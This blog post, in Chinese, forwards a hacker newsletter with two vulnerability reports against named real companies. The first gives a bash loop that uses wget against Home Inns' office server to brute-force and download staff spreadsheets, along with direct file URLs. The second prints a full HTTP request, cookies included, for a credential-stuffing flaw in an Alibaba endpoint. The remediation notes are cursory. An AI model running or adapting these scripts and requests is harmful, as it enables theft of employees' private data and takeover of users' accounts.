搜索此博客

2014年5月22日星期四

Fwd: 如家酒店敏感信息泄露

---------- 转发的邮件 ----------
发件人:"黑客技术" <hackdig@foxmail.com>
日期:2014年5月23日 下午12:23
主题:如家酒店敏感信息泄露
收件人: <sunkeel@gmail.com>
抄送:

本邮件内容由第三方提供,如果您不想继续收到该邮件,可 点此退订
如家酒店敏感信息泄露  阅读原文»

在这个漏洞中,http://wooyun.org/bugs/wooyun-2014-053008,厂商已经做了修补。但是只是限制了列目录,没有做敏感信息访问的ip限制。



http://office.homeinns.com/staffinfo/SMDocument/Upload/2010-5-1317430.xls



http://office.homeinns.com/staffinfo/OCSDocument/Upload/2013-8-27162223.xlsx



都是可以下载的,那么我们可用用一种简单粗暴的方式来爆跑



#!/bin/bash

for((i=1;i<13;i++))

do

        for((j=1000000;j<9999999;j++))

        do

                wget http://office.homeinns.com/staffinfo/SMDocument/Upload/2010-$i-$j.xls
  
        done

done





nohup ./download.sh &

漏洞证明:

剩下的就只是时间了。

修复方案:

对于敏感目录,做ip限制。


黑客技术官网地址:http://www.hackdig.com/

阿里巴巴某系统设计缺陷可造成无限制撞库  阅读原文»

114.1688.com 注销的接口

可以撞库,无验证码!具体我就不演示了

漏洞证明:

POST /portal/portal/answer.jspa HTTP/1.1

Host: portal.manjushri.alibaba.com

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0

Accept: text/plain, */*

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Referer: http://portal.manjushri.alibaba.com/portal/portal/init.jspa?instanceCode=ALIR00000161&scenceCode=SCEN00001423&digest=2a332422be58d7ecfea3ae74b504fca7&question=%E6%99%AE%E9%80%9A%E4%BC%9A%E5%91%98%E6%B3%A8%E9%94%80

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache

Cookie: JSESSIONID=1iyz4xr4zh3xt1o4mdctzng3a5; locale=zh_CN; COOKIE_MJR_USERINFO="%AB%91%A9%C2%09%15%13%FD%DF%F1%ACw%C1_%84%16%F8%C7%95%84%1D%E6%24%E8M%BE%D8%00%03%90%7D%C4%0A%BCM%FC%DD%CA%26%26%D0%1Dd%8F%E8X%E1c_%FC%2C%D7L%04Z%ACU%9E%93%E2G%ED%F4%11%FC%8Dr%1F%7Fz%B3%94"; COOKIE_MJR="%D5O%22s%16G%8A%14%D7%9A%1A%C6%FC%B1%F7%1A%D0%E5T%C4%EF%99x%EAM%D2%84%1A%FB%07%89-%B5%90%81H%EB%3B%3B%AF%25%F8gm%A2%B1%CD%F4";

Content-Length: 314



ciid=%E6%99%AE%E9%80%9A%E4%BC%9A%E5%91%98%E6%B3%A8%E9%94%80__1__%7C%7C__d02c2181-4755-433d-959b-c8c3bb194983&sessionUuid=c93a2f74-5262-4bdb-8c61-d8593c99cbc4&pageTemplate=index_blank&type=7&params=%7B%22__click_name%22%3A%22%5Cn++++++++%5Cn++++++%22%2C%22username%22%3A%2211%22%2C%22_mask_password%22%3A%2211%22%7D



C9426702-8042-4A8C-972D-C7E684A51A0B.png

修复方案:

专家比我懂!


黑客技术官网地址:http://www.hackdig.com/

阅读更多内容

发帖者 时间:

没有评论:

发表评论

订阅: 博文评论 (Atom)